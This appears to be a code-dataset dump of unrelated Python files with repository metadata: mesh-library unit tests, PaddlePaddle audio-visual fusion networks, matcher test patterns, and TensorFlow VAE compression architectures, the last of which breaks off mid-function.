self.assertEqual(35, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertFalse(100 in feMeshSpec.landBoundaryNodes)
self.assertTrue(27 in feMeshSpec.landBoundaryNodes)
self.assertTrue(1 in feMeshSpec.landBoundaryNodes)
self.assertTrue(2 in feMeshSpec.landBoundaryNodes)
finally:
os.remove(mshTestFilePath)
def testSaveMshFileBathyFactor(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridSmallIsland.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
mshTestFilePath = os.path.join(mdldir, 'triangularMeshTest/test_smallIsland_copy.msh')
feMeshSpec.saveAsMsh(mshTestFilePath, bathyFactor=1)
try:
self.assertTrue(os.path.isfile(mshTestFilePath))
feMeshSpec = abTriangularMesh.loadFromMshFile(mshTestFilePath)
self.assertAlmostEqual(-3368, feMeshSpec.nodeBathy[150])
finally:
os.remove(mshTestFilePath)
def testAdjustCrossDatelineVertices(self):
x = [0, 1, .5]
y = [10, 10, 11]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(x, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [-179, 179, 180]
y = [10, 10, 11]
xexps = [181, 179, 180]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [179, -179, 180]
y = [10, 10, 11]
xexps = [179, 181, 180]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [179, 180, -179]
y = [10, 11, 10]
xexps = [179, 180, 181]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [179, -179, -180]
y = [10, 10, 11]
xexps = [-181, -179, -180]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [-179, 179, -180]
y = [10, 10, 11]
xexps = [-179, -181, -180]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
x = [-179, -180, 179]
y = [10, 11, 10]
xexps = [-179, -180, -181]
vertices = [vrtx for vrtx in zip(x, y)]
vertices = abTriangularMesh.adjustCrossDatelineVertices(vertices)
for xexp, yexp, xyfnd in zip(xexps, y, vertices):
self.assertEqual(xexp, xyfnd[0])
self.assertEqual(yexp, xyfnd[1])
def testGetNodesDataFrame(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
df = feMeshSpec.getNodesDataframe()
# some random checks
self.assertEqual(410, len(df))
self.assertEqual(3, len(df.columns))
self.assertAlmostEqual(df[df.index==350].x.values[0], -77.3890650728)
self.assertAlmostEqual(df[df.index==350].y.values[0], 17.6616614616)
self.assertEqual(410, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(119.0, df[df.index==350].bathy.values[0])
if __name__ == '__main__':
unittest.main()
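# Illustration only: a standalone re-implementation of the behaviour the
# tests above expect from abTriangularMesh.adjustCrossDatelineVertices,
# inferred purely from the expected values (the library's real function may
# differ). Triangles straddling the 180th meridian get the minority-sign
# longitudes shifted by 360 degrees so the polygon becomes contiguous:

```python
def adjust_cross_dateline_sketch(vertices):
    """Shift longitudes of a dateline-crossing triangle to be contiguous."""
    xs = [x for x, _ in vertices]
    if max(xs) - min(xs) <= 180:          # does not straddle the dateline
        return [tuple(v) for v in vertices]
    n_pos = sum(1 for x in xs if x >= 0)  # the majority hemisphere wins
    shift = 360 if n_pos >= len(xs) - n_pos else -360
    return [(x + shift, y) if (shift > 0 and x < 0) or (shift < 0 and x > 0)
            else (x, y)
            for x, y in vertices]
```

# This sketch reproduces all seven expectation vectors exercised in
# testAdjustCrossDatelineVertices above.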
| 45.015748 | 97 | 0.719958 | 1,856 | 17,151 | 6.612069 | 0.117457 | 0.119785 | 0.034061 | 0.023468 | 0.830671 | 0.786832 | 0.76043 | 0.752282 | 0.733621 | 0.730443 | 0 | 0.054427 | 0.159058 | 17,151 | 380 | 98 | 45.134211 | 0.796436 | 0.008746 | 0 | 0.65625 | 0 | 0 | 0.043256 | 0.038371 | 0 | 0 | 0 | 0 | 0.446875 | 1 | 0.046875 | false | 0 | 0.028125 | 0 | 0.078125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7644f80502cdf17c108096453efe2bc8d751122f | 84 | py | Python | lib_stylegan/__init__.py | leoHeidel/3d-style | d7dd95c76ffd25d03165ed02692cd3300568b8f3 | [
"MIT"
] | 4 | 2020-12-09T16:38:18.000Z | 2022-03-27T07:10:24.000Z | lib_stylegan/__init__.py | leoHeidel/stylegan2-keras | d7dd95c76ffd25d03165ed02692cd3300568b8f3 | [
"MIT"
] | null | null | null | lib_stylegan/__init__.py | leoHeidel/stylegan2-keras | d7dd95c76ffd25d03165ed02692cd3300568b8f3 | [
"MIT"
] | null | null | null | import lib_stylegan.lib_3d
import lib_stylegan.style_gan
import lib_stylegan.dataset | 28 | 29 | 0.904762 | 14 | 84 | 5.071429 | 0.5 | 0.380282 | 0.71831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0.059524 | 84 | 3 | 30 | 28 | 0.886076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
765b5ab09900db427941d05be0e75daffe691490 | 5,399 | py | Python | model/fusion_net.py | holyseven/Cross-Task-Transfer-for-Geotagged-Audiovisual-Aerial-Scene-Recognition | 9001037caecc35c7bef10009971342b22ccc4221 | [
"MIT"
] | 1 | 2022-02-22T19:08:18.000Z | 2022-02-22T19:08:18.000Z | model/fusion_net.py | holyseven/Cross-Task-Transfer-for-Geotagged-Audiovisual-Aerial-Scene-Recognition | 9001037caecc35c7bef10009971342b22ccc4221 | [
"MIT"
] | null | null | null | model/fusion_net.py | holyseven/Cross-Task-Transfer-for-Geotagged-Audiovisual-Aerial-Scene-Recognition | 9001037caecc35c7bef10009971342b22ccc4221 | [
"MIT"
] | null | null | null | import paddle
import paddle.nn as nn
import numpy as np
class FusionNet(nn.Layer):
def __init__(self, image_net, audio_net,num_classes):
super(FusionNet, self).__init__()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(4096, self.num_classes)
self.relu = nn.ReLU()  # paddle.nn.ReLU takes no inplace argument
def forward(self, image, audio):
image_rep = self.image_net(image)[0] # fc_rep
audio_rep = self.audio_net(audio)[0] # fc_rep
#audio_rep = paddle.zeros_like(image_rep)
#image_rep = self.image_fc1(image_rep)
#image_rep = self.relu(image_rep) # batch_size * 1024
#audio_rep = self.audio_fc1(audio_rep)
#audio_rep = self.relu(audio_rep) # batch_Size * 1024
concat_rep = paddle.concat((image_rep,audio_rep), axis = 1)
concat_rep = self.fusion_fc(concat_rep)
return concat_rep
class FusionNet_Bayes(nn.Layer):
def __init__(self, image_net, audio_net, num_classes):
super(FusionNet_Bayes, self).__init__()
#self.scene_to_event = np.load('scene_to_event_prior_59.npy')
#self.scene_to_event = paddle.to_tensor(self.scene_to_event).cuda()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(4096, self.num_classes)
self.relu = nn.ReLU()  # paddle.nn.ReLU takes no inplace argument
self.softmax = nn.Softmax(axis=1)
def forward(self, image, audio):
image_rep = self.image_net(image)[0] # fc_rep
audio_rep = self.audio_net(audio)[0] # fc_rep
concat_rep = paddle.concat((image_rep,audio_rep), axis = 1)
concat_rep = self.fusion_fc(concat_rep)
'''
scene_predict = self.softmax(concat_rep)
scene_to_event_ = paddle.squeeze(scene_to_event[0,:,:])
#print(scene_to_event_.shape)
event_predict = scene_predict.matmul(scene_to_event_)
'''
return concat_rep
class FusionNet_SQ(nn.Layer):
def __init__(self, image_net, audio_net,num_classes):
super(FusionNet_SQ, self).__init__()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(4096, self.num_classes)
self.KD_fc = nn.Linear(2048, 527)
self.sig = nn.Sigmoid()
def forward(self, image,audio):
image_rep = self.image_net(image)[0] # fc_rep
audio_rep = self.audio_net(audio)[0] # fc_rep
#audio_rep = paddle.zeros_like(image_rep)
concat_rep = paddle.concat((image_rep,audio_rep), axis = 1)
concat_rep = self.fusion_fc(concat_rep)
sed_output = self.KD_fc(audio_rep)
#sed_output = self.sig(sed_output)
return concat_rep, sed_output
class FusionNet_KL(nn.Layer):
def __init__(self, image_net, audio_net,num_classes):
super(FusionNet_KL, self).__init__()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(4096, self.num_classes)
self.KD_fc = nn.Linear(4096, 527)
self.sig = nn.Sigmoid()
def forward(self, image,audio):
image_rep = self.image_net(image)[0] # fc_rep
audio_rep = self.audio_net(audio)[0] # fc_rep
#image_rep = paddle.zeros_like(audio_rep)
concat_rep = paddle.concat((image_rep,audio_rep), axis = 1)
concat_rep_ = self.fusion_fc(concat_rep)
sed_output = self.KD_fc(concat_rep)
sed_output = self.sig(sed_output)
return concat_rep_, sed_output
class FusionNet_uni(nn.Layer):
def __init__(self, image_net, audio_net,num_classes):
super(FusionNet_uni, self).__init__()
self.image_net = image_net
self.audio_net = audio_net
self.num_classes = num_classes
#self.image_fc1 = nn.Linear(2048,1024)
#self.audio_fc1 = nn.Linear(2048,1024)
#self.fusion_fc1 = nn.Linear(2048,512)
#self.fusion_fc2 = nn.Linear(512,self.num_classes)
self.fusion_fc = nn.Linear(2048, self.num_classes)
self.KD_fc = nn.Linear(2048, 527)
self.sig = nn.Sigmoid()
def forward(self, image):
image_rep = self.image_net(image)[0] # fc_rep
#audio_rep = self.audio_net(audio)[0] # fc_rep
concat_rep_ = self.fusion_fc(image_rep)
sed_output = self.KD_fc(image_rep)
sed_output = self.sig(sed_output)
return concat_rep_, sed_output
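# Illustration only (NumPy stand-in, not the paddle modules above): every
# fusion head in this file follows the same late-fusion shape flow -- the
# two 2048-d backbone features are concatenated to 4096-d and mapped to the
# class logits by a single linear layer:

```python
import numpy as np

def late_fusion_logits(image_rep, audio_rep, w, b):
    # image_rep: (N, 2048), audio_rep: (N, 2048) -> fused: (N, 4096)
    fused = np.concatenate([image_rep, audio_rep], axis=1)
    return fused @ w + b  # logits: (N, num_classes)
```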
| 31.758824 | 75 | 0.646231 | 779 | 5,399 | 4.14249 | 0.084724 | 0.069414 | 0.066935 | 0.069724 | 0.850325 | 0.819337 | 0.807561 | 0.807561 | 0.807561 | 0.807561 | 0 | 0.053467 | 0.241341 | 5,399 | 169 | 76 | 31.946746 | 0.734375 | 0.252454 | 0 | 0.7125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.0375 | 0 | 0.2875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
768f672cd0bb1b51eb30682144517415c8e99bda | 3,146 | py | Python | tests/matcher/data.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | 2 | 2021-05-14T22:00:55.000Z | 2021-09-17T20:09:17.000Z | tests/matcher/data.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | null | null | null | tests/matcher/data.py | datapio/klander | d862bb1640a6cf4c0010246e1d53316103321a4d | [
"Apache-2.0"
] | 1 | 2021-07-16T08:35:43.000Z | 2021-07-16T08:35:43.000Z | patterns = [
(
dict(foo='bar'),
dict(field='foo', where=['$eq', 'bar']),
True
),
(
dict(foo='bar'),
dict(field='foo', where=['$eq', 'baz']),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$ne', 'bar']),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$ne', 'baz']),
True
),
(
dict(foo=42),
dict(field='foo', where=['$gt', 41]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$gt', 42]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$gt', 43]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$gte', 41]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$gte', 42]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$gte', 43]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$lt', 43]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$lt', 42]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$lt', 41]),
False
),
(
dict(foo=42),
dict(field='foo', where=['$lte', 43]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$lte', 42]),
True
),
(
dict(foo=42),
dict(field='foo', where=['$lte', 41]),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$in', ['bar', 'baz']]),
True
),
(
dict(foo='bar'),
dict(field='foo', where=['$in', ['baz', 'biz']]),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$nin', ['bar', 'baz']]),
False
),
(
dict(foo='bar'),
dict(field='foo', where=['$nin', ['baz', 'biz']]),
True
),
(
dict(foo=dict(bar='baz')),
dict(field='foo.bar', where=['$eq', 'baz']),
True
),
(
dict(foo=[dict(bar='baz'), dict(bar='biz')]),
dict(field='foo[*].bar', where=['$in', ['baz', 'biz']]),
True
),
(
dict(foo=[dict(bar='baz'), dict(bar='biz')]),
dict(field='foo[*].bar', where=['$eq', 'baz']),
False
),
(
dict(foo=23, bar=42),
dict(oneOf=[
dict(field='foo', where=['$eq', 42]),
dict(field='bar', where=['$eq', 42])
]),
True
),
(
dict(foo=23, bar=23),
dict(oneOf=[
dict(field='foo', where=['$eq', 42]),
dict(field='bar', where=['$eq', 42])
]),
False
),
(
dict(foo=42, bar=42),
dict(allOf=[
dict(field='foo', where=['$eq', 42]),
dict(field='bar', where=['$eq', 42])
]),
True
),
(
dict(foo=42, bar=23),
dict(allOf=[
dict(field='foo', where=['$eq', 42]),
dict(field='bar', where=['$eq', 42])
]),
False
)
]
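# The tuples above are (document, pattern, expected_match). Illustration
# only -- this is NOT klander's actual matcher, which also resolves
# JSONPath-style fields such as 'foo.bar' and 'foo[*].bar' -- a minimal
# evaluator covering the flat, top-level cases could look like:

```python
_OPS = {
    '$eq': lambda v, o: v == o,
    '$ne': lambda v, o: v != o,
    '$gt': lambda v, o: v > o,
    '$gte': lambda v, o: v >= o,
    '$lt': lambda v, o: v < o,
    '$lte': lambda v, o: v <= o,
    '$in': lambda v, o: v in o,
    '$nin': lambda v, o: v not in o,
}

def simple_match(document, pattern):
    """Evaluate a pattern against a document (top-level fields only)."""
    if 'oneOf' in pattern:
        return any(simple_match(document, p) for p in pattern['oneOf'])
    if 'allOf' in pattern:
        return all(simple_match(document, p) for p in pattern['allOf'])
    op, operand = pattern['where']
    return _OPS[op](document.get(pattern['field']), operand)
```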
| 20.973333 | 64 | 0.373172 | 331 | 3,146 | 3.546828 | 0.072508 | 0.237649 | 0.27598 | 0.34753 | 0.947189 | 0.937819 | 0.927598 | 0.905451 | 0.760647 | 0.287905 | 0 | 0.041451 | 0.386523 | 3,146 | 149 | 65 | 21.114094 | 0.566839 | 0 | 0 | 0.610738 | 0 | 0 | 0.095041 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
76a0ec698289c1dacfa0678d60750d51ad79b814 | 218 | py | Python | dhnx/optimization/__init__.py | oemof-heat/DHNx | edb5c9be17f74d7f200c1eb6a17000a26633bdc3 | [
"MIT"
] | null | null | null | dhnx/optimization/__init__.py | oemof-heat/DHNx | edb5c9be17f74d7f200c1eb6a17000a26633bdc3 | [
"MIT"
] | 10 | 2019-11-01T18:03:13.000Z | 2020-02-19T14:07:35.000Z | dhnx/optimization/__init__.py | oemof-heat/district_heating_simulation | edb5c9be17f74d7f200c1eb6a17000a26633bdc3 | [
"MIT"
] | null | null | null | from . import add_components # noqa: F401
from . import dhs_nodes # noqa: F401
from . import oemof_heatpipe # noqa: F401
from . import optimization_models # noqa: F401
from . import precalc_hydraulic # noqa: F401
| 36.333333 | 47 | 0.747706 | 30 | 218 | 5.266667 | 0.466667 | 0.316456 | 0.303797 | 0.455696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08427 | 0.183486 | 218 | 5 | 48 | 43.6 | 0.803371 | 0.247706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4f8d4d0dc84bb7d9d58b9a9150072e7f344fe7c4 | 186 | py | Python | code/world/__init__.py | FrederikWR/course-02443-stochastic-virus-outbreak | 4f1d7f1fa4aa197b31ed86c4daf420d5a637974e | [
"MIT"
] | null | null | null | code/world/__init__.py | FrederikWR/course-02443-stochastic-virus-outbreak | 4f1d7f1fa4aa197b31ed86c4daf420d5a637974e | [
"MIT"
] | null | null | null | code/world/__init__.py | FrederikWR/course-02443-stochastic-virus-outbreak | 4f1d7f1fa4aa197b31ed86c4daf420d5a637974e | [
"MIT"
] | null | null | null |
from .regions import regions, Region
from .routes import routes, Route
from ._cross_reference import cross_reference as _cross_reference
import tools
_cross_reference(regions, routes)
| 23.25 | 65 | 0.83871 | 25 | 186 | 5.96 | 0.4 | 0.375839 | 0.268456 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11828 | 186 | 7 | 66 | 26.571429 | 0.908537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4f9a9b90d1aed19552fdb0d97ecbfc5f801e918e | 41,188 | py | Python | code/clic/architectures.py | gergely-flamich/miracle-compression | 7bee78f47982dda123343d25ead9de3c8bce17f5 | [
"MIT"
] | null | null | null | code/clic/architectures.py | gergely-flamich/miracle-compression | 7bee78f47982dda123343d25ead9de3c8bce17f5 | [
"MIT"
] | 14 | 2020-01-28T22:13:39.000Z | 2022-02-10T00:22:22.000Z | code/clic/architectures.py | gergely-flamich/miracle-compression | 7bee78f47982dda123343d25ead9de3c8bce17f5 | [
"MIT"
] | null | null | null | import tensorflow as tf
from sonnet import AbstractModule, Linear, BatchFlatten, BatchReshape, reuse_variables, \
Conv2D, BatchNorm
import tensorflow_probability as tfp
tfd = tfp.distributions
from miracle_modules import ConvDS
from utils import InvalidArgumentError
# ==============================================================================
# ==============================================================================
#
# Superclasses
#
# ==============================================================================
# ==============================================================================
class ClicVAE(AbstractModule):
_allowed_priors = ["gaussian", "laplace"]
_allowed_likelihoods = ["gaussian", "laplace"]
_allowed_paddings = ["SAME", "VALID", "SAME_MIRRORED"]
def __init__(self,
prior="gaussian",
likelihood="gaussian",
padding="SAME",
name="clic_vae"):
# Initialise the superclass
super(ClicVAE, self).__init__(name=name)
if prior not in self._allowed_priors:
raise InvalidArgumentError("prior must be one of {}".format(self._allowed_priors))
if likelihood not in self._allowed_likelihoods:
raise InvalidArgumentError("likelihood must be one of {}".format(self._allowed_likelihoods))
if padding not in self._allowed_paddings:
raise InvalidArgumentError("padding must be one of {}".format(self._allowed_paddings))
self._prior_dist = prior
self._likelihood = likelihood
self._padding = padding
def required_input_size(self, shape, for_padding="VALID"):
raise NotImplementedError
@reuse_variables
def encode(self, inputs):
raise NotImplementedError
@reuse_variables
def decode(self, latents):
raise NotImplementedError
@property
def log_prob(self):
self._ensure_is_connected()
return tf.reduce_sum(self._log_prob)
@property
def kl_divergence(self):
"""
Calculates the KL divergence between the current variational posterior and the prior:
KL[ q(z | theta) || p(z) ]
"""
self._ensure_is_connected()
return tf.reduce_sum(
tfd.kl_divergence(self._q, self._latent_prior))
def _build(self, inputs):
"""
Build standard VAE:
1. Encode input -> latent mu, sigma
2. Sample z ~ N(z | mu, sigma)
3. Decode z -> likelihood location parameters
4. Evaluate the Gaussian/Laplace likelihood p(o | z)
"""
# Get the means and variances of variational posteriors
q_mu, q_sigma = self.encode(inputs)
if self._prior_dist == "gaussian":
q = tfd.Normal(loc=q_mu, scale=q_sigma)
elif self._prior_dist == "laplace":
q = tfd.Laplace(loc=q_mu, scale=q_sigma)
latents = q.sample()
if self._prior_dist == "gaussian":
self._latent_prior = tfd.Normal(loc=tf.zeros_like(latents), scale=tf.ones_like(latents))
elif self._prior_dist == "laplace":
self._latent_prior = tfd.Laplace(loc=tf.zeros_like(latents), scale=tf.ones_like(latents))
# Needed to calculate KL term
self._q = q
# Get likelihood location parameters
p_logits = self.decode(latents)
if self._likelihood == "gaussian":
p = tfd.Normal(loc=p_logits, scale=tf.ones_like(p_logits))
else:
p = tfd.Laplace(loc=p_logits, scale=tf.ones_like(p_logits))
self._log_prob = p.log_prob(inputs)
return p_logits
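# Illustration only: in the Gaussian case, the tfd.kl_divergence(q, prior)
# used by kl_divergence above reduces per dimension to the closed form
# KL(N(mu, sigma) || N(0, 1)) = -log(sigma) + (sigma^2 + mu^2 - 1) / 2;
# a NumPy sketch of one term, independent of TensorFlow:

```python
import numpy as np

def gaussian_kl_to_std_normal(mu, sigma):
    """Elementwise KL(N(mu, sigma) || N(0, 1))."""
    return -np.log(sigma) + (sigma ** 2 + mu ** 2 - 1.0) / 2.0
```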
# ==============================================================================
class ClicHierarchicalVAE(AbstractModule):
_allowed_latent_dists = {
"gaussian": tfd.Normal,
"laplace": tfd.Laplace
}
_allowed_likelihoods = {
"gaussian": tfd.Normal,
"laplace": tfd.Laplace
}
_allowed_paddings = ["SAME", "VALID", "SAME_MIRRORED"]
_latent_priors = []
_latent_posteriors = []
def __init__(self,
num_levels,
latent_dist="gaussian",
likelihood="gaussian",
standardized=False,
padding_first_level="SAME",
padding_second_level="SAME",
name="hierarchical_vae"):
super(ClicHierarchicalVAE, self).__init__(name=name)
self._num_levels = num_levels
if latent_dist not in self._allowed_latent_dists:
raise InvalidArgumentError("latent_dist must be one of {}".format(self._allowed_latent_dists))
self._latent_dist = self._allowed_latent_dists[latent_dist]
if likelihood not in self._allowed_likelihoods:
raise InvalidArgumentError("likelihood must be one of {}".format(self._allowed_likelihoods))
self._likelihood_dist = self._allowed_likelihoods[likelihood]
if padding_first_level not in self._allowed_paddings:
raise InvalidArgumentError("padding_first_level must be one of {}".format(self._allowed_paddings))
self._padding_first_level = padding_first_level
if padding_second_level not in self._allowed_paddings:
raise InvalidArgumentError("padding_second_level must be one of {}".format(self._allowed_paddings))
self._padding_second_level = padding_second_level
self._standardized = standardized
@reuse_variables
def encode(self, inputs):
raise NotImplementedError
@reuse_variables
def decode(self, latents):
raise NotImplementedError
@property
def kl_divergence(self):
self._ensure_is_connected()
if (len(self._latent_posteriors) != self._num_levels or
len(self._latent_priors) != self._num_levels):
raise RuntimeError("Need a full pass through the VAE to calculate the KL divergence!")
klds = [tfd.kl_divergence(posterior, prior)
for posterior, prior in zip(self._latent_posteriors, self._latent_priors)]
return klds
@property
def log_prob(self):
self._ensure_is_connected()
if (len(self._latent_posteriors) != self._num_levels or
len(self._latent_priors) != self._num_levels):
raise RuntimeError("Need a full pass through the VAE to calculate the log probability!")
return tf.reduce_sum(self._log_prob)
def _build(self, inputs):
latents = self.encode(inputs,
level=self._num_levels)
decoded_loc, decoded_scale = self.decode(latents,
decode_level=self._num_levels)
likelihood_scale = decoded_scale if not self._standardized else tf.ones_like(decoded_scale)
self._likelihood = self._likelihood_dist(loc=decoded_loc,
scale=likelihood_scale)
self._log_prob = self._likelihood.log_prob(inputs)
return decoded_loc
# ==============================================================================
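The `kl_divergence` and `log_prob` properties above supply the two pieces of the evidence lower bound. A scalar sketch of how they combine, together with the closed-form KL that `tfd.kl_divergence` evaluates element-wise for a Gaussian posterior against a standard-normal prior (function names are illustrative):

```python
import math

def kl_normal_std(mu, sigma):
    # Closed-form KL( N(mu, sigma^2) || N(0, 1) ) -- the quantity
    # tfd.kl_divergence returns element-wise for a standard-normal prior.
    return 0.5 * (mu ** 2 + sigma ** 2 - 1.0) - math.log(sigma)

def elbo(log_prob, klds):
    # Evidence lower bound: reconstruction log-likelihood minus the
    # KL contribution of every stochastic level.
    return log_prob - sum(klds)
```

The KL is zero exactly when the posterior already equals the prior, which is why a full pass through the network is required before either property can be read.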
# ==============================================================================
#
# Experimental architectures
#
# ==============================================================================
# ==============================================================================
class ClicCNN(ClicVAE):
def __init__(self,
top_conv_channels=128,
bottom_conv_channels=192,
prior="gaussian",
likelihood="gaussian",
padding="SAME",
name="clic_cnn_vae"):
# Initialise the superclass
super(ClicCNN, self).__init__(prior=prior,
likelihood=likelihood,
padding=padding,
name=name)
self._top_conv_channels = top_conv_channels
self._bottom_conv_channels = bottom_conv_channels
def required_input_size(self, shape, for_padding="VALID"):
# Note: encode() must have been connected first so that the
# convolution layers referenced below exist
shape = self.conv_mu.required_input_size(shape, for_padding=for_padding)
shape = self.conv_ds3.required_input_size(shape, for_padding=for_padding)
shape = self.conv_ds2.required_input_size(shape, for_padding=for_padding)
shape = self.conv_ds1.required_input_size(shape, for_padding=for_padding)
return shape
@reuse_variables
def encode(self, inputs):
"""
The encoder will predict the variational
posterior q(z | x) = N(z | mu(x), sigma(x)).
This is done using a two-headed network.
Note: reuse_variables is required so that when we call
encode on its own, it uses the trained weights
"""
# ----------------------------------------------------------------------
# Define layers
# ----------------------------------------------------------------------
# First convolution layer
self.conv_ds1 = ConvDS(output_channels=self._top_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=True,
name="encoder_conv_ds1")
# Second convolution layer
self.conv_ds2 = ConvDS(output_channels=self._top_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=True,
name="encoder_conv_ds2")
# Third convolution layer
self.conv_ds3 = ConvDS(output_channels=self._top_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=True,
name="encoder_conv_ds3")
# Latent distribution moment predictors
# Mean
self.conv_mu = ConvDS(output_channels=self._bottom_conv_channels,
kernel_shape=(5, 5),
padding=self._padding,
downsampling_rate=2,
use_gdn=False,
name="encoder_conv_mu")
# Covariance
